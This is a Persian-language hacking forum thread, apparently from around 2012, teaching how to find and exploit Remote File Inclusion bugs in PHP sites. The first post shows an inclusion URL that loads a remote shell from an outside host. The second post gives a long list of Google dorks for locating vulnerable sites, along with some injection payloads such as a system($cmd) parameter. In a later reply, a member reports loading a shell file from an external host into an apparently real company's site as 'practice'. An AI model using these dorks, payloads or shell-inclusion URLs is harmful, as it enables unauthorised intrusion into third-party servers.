SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

آموزش کامل باگ Remote File Include

بستن
X
 
 • فیلتر
 • زمان
 • نمایش
پاک کردن همه
نوشته‌های جدید

 • آموزش کامل باگ Remote File Include

  به نام خالق هستی

  سلامی به زیبایی عشق

  درود بر عزیزان در این آموزش در خدمت شما هستیم با توضیحاتی راجع به باگ Rfi در خدمت شما هستیم این باگ مخفف کلمه Remote File Inclusion که معنی پارسی آن کنترل از راه دور یک فایل میباشد و اما این باگ چگونه رخ میدهد ، این باگ در مواقعی رخ میدهد که برنامه نویس در هنگام استفاده از توابع درخواست یک فایل اشتباهی انجام دهد . این توابع میتواند شامل get_include_path , get_included_files, get_loaded_extensions ,Include , Require و ... باشد که یک فایل را از آدرسی گرفته و عملیاتی که برنامه نویس برای آن تعریف کرده را انجام میدهد حال اگر برنامه نویس در تعریف این توابع اشتباهی انجام دهد منجر به ایجاد باگ میشود که به جای فایل دریافتی ما فایل خود را جاگزین میکنیم و در نهایت فایل ما لود میشود به مثال زیر توجه نمایید :

  [align=LEFT]
  [align=RIGHT]
  كد های بالا را در يك فولدر با پسوند Php ذخيره كنيد و در سرور قرار دهید حالا اجرا کنید خواهيد ديد كه وقتي كد اول را اجرا ميكنيد جمله Google.CoM در صفحه چاپ میشود یا همون نمایش .

  اگر توانستیم به Include مقداری ارسال کنیم و صفحه ما بارگذاری شود آن کد Rfi دارد
  [/align]
  [/align]

  در کد بالا تابع Rfi با مقداری که به Get میدهیم مقدار دهی میشود .

  که به این صورت میتوانیم به متغیر مقدار دهی کنیم :  [align=LEFT][php]site.com/index.php?bug=File Src[/php][/align]

  و در جهت نفوذ آدرس فایل را خودمان وارد میکنیم مثلا :

  [align=LEFT][php]site.com/index.php?get=http://shell.com/shell.txt?[/php][/align]


  و فایل ما اجرا میشود . روش شناسایی این باگ بصورتی است که شما به یک ادرس اینچنینی برخورد میکنید :

  [align=LEFT][php]site.com/index.php?page=IRH.Html[/php][/align]

  یک کاراکتر به انتهای نام اضافه کنید :

  [align=LEFT][php]site.com/index.php?page=IRH.Html*[/php][/align]

  حال اگر برنامه نویس در مقدار دهی دقت نکرده باشد با خطای مشابه زیر روبه رو میشویم و این نشان دهنده وجود باگ RFI میباشد .

  [align=LEFT][php]Warning: include(index.php) [function.include]: failed to open stream: No such file or directory in C:\Serv\www\rfi.php on line 2
  Warning: include() [function.include]: Failed opening index.php' for inclusion (include_path='.;C:\php5\pear') in Serv\www\rfi.php on line 2
  [/php][/align]
  دقت داشته باشین هر خطایی مبتنی بر داشتن باگ RFI نیست و میتونه باگ LFI باشه

  این مقاله رو میتونید با پسوند PDF از اینجا دریافت کنید .

  و من الله توفیق
  [align=center][/align]

 • #2
  2012 RFI Dorks

  و در ادامه برای دوستانی که علاقه مند به یادگیری هستند تعدادی Dork قرار میدهم . پاینده باشید :


  [align=LEFT][php]


  Read more: #./ro0t3r.sh: RFI Dork Collection http://iniseni.blogspot.com/2011/12/rfi-dork-collection.html#ixzz27s540K1w

  inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

  inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

  inurl:/include/new-visitor.inc.php?lvc_include_dir=

  inurl:/_functions.php?prefix=

  inurl:/cpcommerce/_functions.php?prefix=

  inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

  inurl:/modules/agendax/addevent.inc.php?agendax_path=

  inurl:/ashnews.php?pathtoashnews=

  inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

  inurl:/pm/lib.inc.php?pm_path=

  inurl:/b2-tools/gm-2-b2.php?b2inc=

  inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

  inurl:/modules/agendax/addevent.inc.php?agendax_path=

  inurl:/includes/include_once.php?include_file=

  inurl:/e107/e107_handlers/secure_img_render.php?p=

  inurl:/shoutbox/expanded.php?conf=

  inurl:/main.php?x=

  inurl:/myPHPCalendar/admin.php?cal_dir=

  inurl:/index.php/main.php?x=

  inurl:/index.php?include=

  inurl:/index.php?x=

  inurl:/index.php?open=

  inurl:/index.php?visualizar=

  inurl:/template.php?pagina=

  inurl:/index.php?pagina=

  inurl:/index.php?inc=

  inurl:/includes/include_onde.php?include_file=

  inurl:/index.php?page=

  inurl:/index.php?pg=

  inurl:/index.php?show=

  inurl:/index.php?cat=

  inurl:/index.php?file=

  inurl:/db.php?path_local=

  inurl:/index.php?site=

  inurl:/htmltonuke.php?filnavn=

  inurl:/livehelp/inc/pipe.php?HCL_path=

  inurl:/hcl/inc/pipe.php?HCL_path=

  inurl:/inc/pipe.php?HCL_path=

  inurl:/support/faq/inc/pipe.php?HCL_path=

  inurl:/help/faq/inc/pipe.php?HCL_path=

  inurl:/helpcenter/inc/pipe.php?HCL_path=

  inurl:/live-support/inc/pipe.php?HCL_path=

  inurl:/gnu3/index.php?doc=

  inurl:/gnu/index.php?doc=

  inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

  inurl:/forum/install.php?phpbb_root_dir=

  inurl:/includes/calendar.php?phpc_root_path=

  inurl:/includes/setup.php?phpc_root_path=

  inurl:/inc/authform.inc.php?path_pre=

  inurl:/include/authform.inc.php?path_pre=

  inurl:index.php?nic=

  inurl:index.php?sec=

  inurl:index.php?content=

  inurl:index.php?link=

  inurl:index.php?filename=

  inurl:index.php?dir=

  inurl:index.php?document=

  inurl:index.php?view=

  inurl:*.php?sel=

  inurl:*.php?session=&content=

  inurl:*.php?locate=

  inurl:*.php?place=

  inurl:*.php?layout=

  inurl:*.php?go=

  inurl:*.php?catch=

  inurl:*.php?mode=

  inurl:*.php?name=

  inurl:*.php?loc=

  inurl:*.php?f=

  inurl:*.php?inf=

  inurl:*.php?pg=

  inurl:*.php?load=

  inurl:*.php?naam=

  allinurl:/index.php?page= site:*.dk

  allinurl:/index.php?file= site:*.dk

  INURL OR ALLINURL WITH:

  /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

  /includes/header.php?systempath=

  /Gallery/displayCategory.php?basepath=

  /index.inc.php?PATH_Includes=

  /ashnews.php?pathtoashnews=

  /ashheadlines.php?pathtoashnews=

  /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

  /demo/includes/init.php?user_inc=

  /jaf/index.php?show=

  /inc/shows.inc.php?cutepath=

  /poll/admin/common.inc.php?base_path=

  /pollvote/pollvote.php?pollname=

  /sources/post.php?fil_config=

  /modules/My_eGallery/public/displayCategory.php?basepath=

  /bb_lib/checkdb.inc.php?libpach=

  /include/livre_include.php?no_connect=lol&chem_absolu=

  /index.php?from_market=Y&pageurl=

  /modules/mod_mainmenu.php?mosConfig_absolute_path=

  /pivot/modules/module_db.php?pivot_path=

  /modules/4nAlbum/public/displayCategory.php?basepath=

  /derniers_commentaires.php?rep=

  /modules/coppermine/themes/default/theme.php?THEME_DIR=

  /modules/coppermine/include/init.inc.php?CPG_M_DIR=

  /modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

  /coppermine/themes/maze/theme.php?THEME_DIR=

  /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

  /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

  /myPHPCalendar/admin.php?cal_dir=

  /agendax/addevent.inc.php?agendax_path=

  /modules/mod_mainmenu.php?mosConfig_absolute_path=

  /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

  /main.php?page=

  /default.php?page=

  /index.php?action=

  /index1.php?p=

  /index2.php?x=

  /index2.php?content=

  /index.php?conteudo=

  /index.php?cat=

  /include/new-visitor.inc.php?lvc_include_dir=

  /modules/agendax/addevent.inc.php?agendax_path=

  /shoutbox/expanded.php?conf=

  /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

  /pivot/modules/module_db.php?pivot_path=

  /library/editor/editor.php?root=

  /library/lib.php?root=

  /e107/e107_handlers/secure_img_render.php?p=

  /zentrack/index.php?configFile=

  /main.php?x=

  /becommunity/community/index.php?pageurl=

  /GradeMap/index.php?page=

  /index4.php?body=

  /side/index.php?side=

  /main.php?page=

  /es/index.php?action=

  /index.php?sec=

  /index.php?main=

  /index.php?sec=

  /index.php?menu=

  /html/page.php?page=

  /page.php?view=

  /index.php?menu=

  /main.php?view=

  /index.php?page=

  /content.php?page=

  /main.php?page=

  /index.php?x=

  /main_site.php?page=

  /index.php?L2=

  /content.php?page=

  /main.php?page=

  /index.php?x=

  /main_site.php?page=

  /index.php?L2=

  /index.php?show=

  /tutorials/print.php?page=

  /index.php?page=

  /index.php?level=

  /index.php?file=

  /index.php?inter_url=

  /index.php?page=

  /index2.php?menu=

  /index.php?level=

  /index1.php?main=

  /index1.php?nav=

  /index1.php?link=

  /index2.php?page=

  /index.php?myContent=

  /index.php?TWC=

  /index.php?sec=

  /index1.php?main=

  /index2.php?page=

  /index.php?babInstallPath=

  /main.php?body=

  /index.php?z=

  /main.php?view=

  /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

  /index.php?file=

  /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


  1. allinurl:my_egallery site:.org
  /modules/My_eGallery/public/displayCategory.php?basepath=

  2. allinurl:xgallery site:.org
  /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

  3. allinurl:coppermine site:.org
  /modules/coppermine/themes/default/theme.php?THEME_DIR=

  4. allinurl:4nAlbum site:.org
  /modules/4nAlbum/public/displayCategory.php?basepath=

  5. allinurlP:NphpBB2 site:.org
  /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

  6. allinurl:ihm.php?p=

  7. Keyword : "powered by AllMyLinks"
  /include/footer.inc.php?_AMLconfig[cfg_serverpath]=

  8. allinurl:/modules.php?name=allmyguests
  /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

  9. allinurl:/Popper/index.php?
  /Popper/index.php?childwindow.inc.php?form=

  10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
  yahoo = by Kietu? v 3.2
  /kietu/index.php?kietu[url_hit]=

  11. keyword : "Powered by phpBB 2.0.6"
  /html&highlight=%2527.include($_GET[a]),exit.%2527&a=

  12. keyword : "powered by CubeCart 3.0.6"
  /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

  13. keyword : "powered by paBugs 2.0 Beta 3"
  /class.mysql.php?path_to_bt_dir=

  14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
  /ashnews.php?pathtoashnews=

  15. keyword : /phorum/login.php
  /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

  16. allinurl:ihm.php?p=*

  14. keyword : "powered eyeOs"
  /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
  diganti dengan :
  /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=

  15. allinurl:.php?bodyfile=

  16. allinurl:/includes/orderSuccess.inc.php?glob=
  /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

  17. allinurl:forums.html
  /modules.php?name=

  18. allinurl:/default.php?page=home

  19. allinurl:/folder.php?id=

  20. allinurl:main.php?pagina=
  /paginedinamiche/main.php?pagina=

  21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
  /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

  22. allinurl:application.php?base_path=
  /application.php?base_path=

  23. allinurlp:hplivehelper
  /phplivehelper/initiate.php?abs_path=

  24. allinurlp:hpnuke
  /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

  25. key word : "powered by Fantastic News v2.1.2"
  /archive.php?CONFIG[script_path]=

  26. keyword: "powered by smartblog" AND inurl:?page=login
  /index.php?page=

  27. allinurl:/forum/
  /forum/admin/index.php?inc_conf=

  28. keyword:"Powered By FusionPHP"
  /templates/headline_temp.php?nst_inc=

  29. allinurl:shoutbox/expanded.php filetypep:hp
  /shoutbox/expanded.php?conf=

  30. allinurl: /osticket/
  /osticket/include/main.php?config[search_disp]=true&include_dir=

  31. keyword : "Powered by iUser"
  /common.php?include_path=

  32. allinurl: "static.php?load="
  /static.php?load=

  33. keyworld : /phpcoin/login.php
  /phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

  34. keyworld: allinurl:/phpGedview/login.php site:
  /help_text_vars.php?dir&PGV_BASE_DIRECTORY=

  35. allinurl:/folder.php?id=
  /classes.php?LOCAL_PATH=

  inurl:"/lire.php?rub="

  inurl:"/os/pointer.php?url="

  inurl:"folder.php?id="

  inurl:"show.php?page="

  inurl:"index2.php?DoAction="

  inurl:"index.php?canal="

  inurl:"index.php?screen="

  inurl:"index.php?langc="

  inurl:"index.php?Language="

  inurl:"view.php?page="

  dork: "powered by doodle cart"
  rfi of this dork: enc/content.php?Home_Path=

  dork: "Login to Calendar"
  rfi of this dork: /embed/day.php?path=

  dork: "powered by EQdkp"
  rfi of this dork: /includes/dbal.php?eqdkp_root_path=

  inurl:"template.php?goto="

  inurl:"video.php?content="

  inurl:"pages.php?page="

  inurl:"index1.php?choix="

  inurl:"index1.php?menu="

  inurl:"index2.php?ascii_seite="

  dork: inurl:surveys
  rfi to this dork: /surveys/survey.inc.php?path=

  inurl:"index.php?body="

  dork: allinurl:adobt sitel
  rfi to this dork: /classes/adodbt/sql.php?classes_dir=

  dork: "Powered By ScozNews"
  rfi to this dork: /sources/functions.php?CONFIG[main_path]=
  rfi to this dork: /sources/template.php?CONFIG[main_path]=

  inurl:"kb_constants.php?module_root_path="

  dork: allinurl:"mcf.php"
  rfi to this dork: /mcf.php?content=

  dork: inurl:"main.php?sayfa="
  rfi to this dork: /main.php?sayfa=

  dork: "MobilePublisherPHP"
  rfi to this dork: /header.php?abspath=

  dork: "powered by phpCOIN 1.2.3"
  rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

  allinurl:login.php?dir=

  inurl:"index.php?go="

  inurl:"index1.php?="

  inurl:"lib/gore.php?libpath="

  inurl:"index2.php?p="  [/php][/align]
  [align=center][/align]

  نظر


  • #3
   RE: آموزش کامل باگ Remote File Include

   سلام آقا حسین ببخشید اسپم دادم شل باید با فرمت txt باشه ؟ :7:
   hohihi

   نظر


   • #4
    RE: آموزش کامل باگ Remote File Include

    نوشته اصلی توسط moeintak
    سلام آقا حسین ببخشید اسپم دادم شل باید با فرمت txt باشه ؟ :7:
    با اجازه آقا حسین عزیز.

    نه دوست گرامی میشه با پسوند PHP هم باشه.

    نظر


    • #5
     RE: آموزش کامل باگ Remote File Include

     بستگی به نوع امنیت سرور و آسیب پذیری داره بعضی مواقع txt و بعضی مواقع php

     در مواقعی که با txt تست میکنید ? در انتهای .txt فراموش نشه .
     [align=center][/align]

     نظر


     • #6
      RE: آموزش کامل باگ Remote File Include

      سلام
      ببخشید من یک سوالی داشتم و سوالم این هست که من یک تارگت تمرینی از توی تایبیک برداشتم و تمرین کنم و تارگت مورد نظر بس از آبلود شل اینتوری میشه ...
      البته من چند تا شل آبلود کردم و شل ها سالم بودنند ...
      دلیلش چی میتونه باشه ؟
      http://www.insurancebrokersusa.com/page.php?page=http://www.Sh3LL.org/sniper.txt?
      آیا بابیس خاصی داره یا مشکل از تارگت هستش ؟
      ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

      نظر


      • #7
       RE: آموزش کامل باگ Remote File Include

       كسي نبود جواب بده ....!!!
       ببخشيد اسپم دادم ...
       ولي خوب مهمه ...
       بدرود
       ><><><><><><><><>><NaMe Of GoD><><><><><><><><><

       نظر

       صبر کنید ..
       X